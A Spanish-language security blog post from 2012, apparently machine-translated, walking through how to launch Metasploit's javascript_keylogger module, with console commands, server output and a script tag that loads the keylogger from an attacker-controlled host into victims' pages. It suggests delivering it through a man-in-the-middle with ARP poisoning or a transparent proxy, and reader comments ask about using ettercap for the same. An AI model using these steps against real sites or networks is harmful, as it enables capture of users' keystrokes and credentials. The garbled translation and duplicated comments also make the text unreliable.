ClsHack:Computer Security Blog    

[Metasploit] Cómo utilizar el módulo javascript_keylogger :D

Publicado el: 5 Febrero 2012

Lo’ acaba de ser añadido a Metasploit la forma:
javascript_keylogger

Este módulo es muy útil durante un MITM o después de entrar en un sitio.

Vamos a ver cómo utilizar :D

Ok, ahora se puede proceder :D
Actualizamos Metasploit:
sudo msfupdate

Empezamos Metasploit:
sudo msfconsole

Que la forma:
search javascript keylogger

Utilizar:
auxiliary/server/capture/javascript_keylogger

Ahora vamos a ver las opciones:
show options

Una vez que inicie el servidor configurado :)
En primer lugar recordar para detener cualquier servidor apache / web en el puerto 80:
sudo service apache2 stop

Ejecutar y escriba:
[*] Starting keylogger. Please press [CTRl]+[C] if you wish to terminate.
[*] Using URL: http://192.168.1.190:80/
[*] Server started.
[*] 192.168.1.190 - [05/Feb/2012:09:41:02 UTC] - [HTTP GET] - /metasploit
[*] 192.168.1.190 - [05/Feb/2012:09:41:02 UTC] - [HTTP GET] - /tOfpzuCWLJsM.js
[*] 192.168.1.190 - [05/Feb/2012:09:41:06 UTC] - [HTTP GET] - /tOfpzuCWLJsM.js

Bueno, ahora, ahora tenemos muchas formas de ejecución de JavaScript en las páginas web que genera:
<script type="text/javascript" src="http://192.168.1.190:80/jstOfpzuCWLJsM.js"></script>

Sugiero lo siguiente :D
[RUBY]Proxy transparente && Inyectar HTML / JavaScript

O podemos usar paros proxy o ZEP :)

Envenenamiento ARP con scapy y la solicitud Web falsa con el proxy de paros en la caja posterior

Puestos relacionados con:

  1. [Metasploit] Cómo añadir el módulo INESTABLE :)
  2. CVE-2010-3765: Mozilla Firefox remota de código Excution módulo de Metasploit
  3. XSS: MÁS POTENCIA CON carne de Metasploit
  4. [Cómo se hace]Metasploit && XSSF – Cross-Site Scripting Framework v.2.1
  5. [CVE-2010-2568]Metasploit:oy en día las ventanas Exuction remota de código

Esta entrada fue publicada el domingo, 05 de febrero, 2012 en 9:56 am y está clasificada bajo: GNU / Linux, Piratería, Software. Puedes seguir cualquier respuesta a esta entrada a través de la RSS 2.0 alimentar. Usted puede dejar una respuesta, o trackback desde tu propio sitio.

Etiquetado con:
  • Sombras Viper

    muy interesante… ma ho un problema.
    Lo que quiero hacer es utilizar ettercap para un MITM, pero luego no sé cómo usar un proxy transparente como el que se recomienda que.

  • ShadowyViper

    muy interesante… ma ho un problema.
    Lo que quiero hacer es utilizar ettercap para un MITM, pero luego no sé cómo usar un proxy transparente como el que se recomienda que.

  • Anónimo

    Mira los enlaces que he publicado en el artículo y los artículos relacionados :D

  • ClsHackBlog

    Mira los enlaces que he publicado en el artículo y los artículos relacionados :D

  • http://twitter.com / SocketReve Lucas Reverberi

    Interesante…Yo hice lo mismo con scapy y el modo de nginx proxy y el sub_filter regla para inyección de JavaScript, pero creo que es mucho mejor! :D (<3 Metasploit <3)

  • http://twitter.com / SocketReve Lucas Reverberi

    Interesante…Yo hice lo mismo con scapy y el modo de nginx proxy y el sub_filter regla para inyección de JavaScript, pero creo que es mucho mejor! :D (<3 Metasploit <3)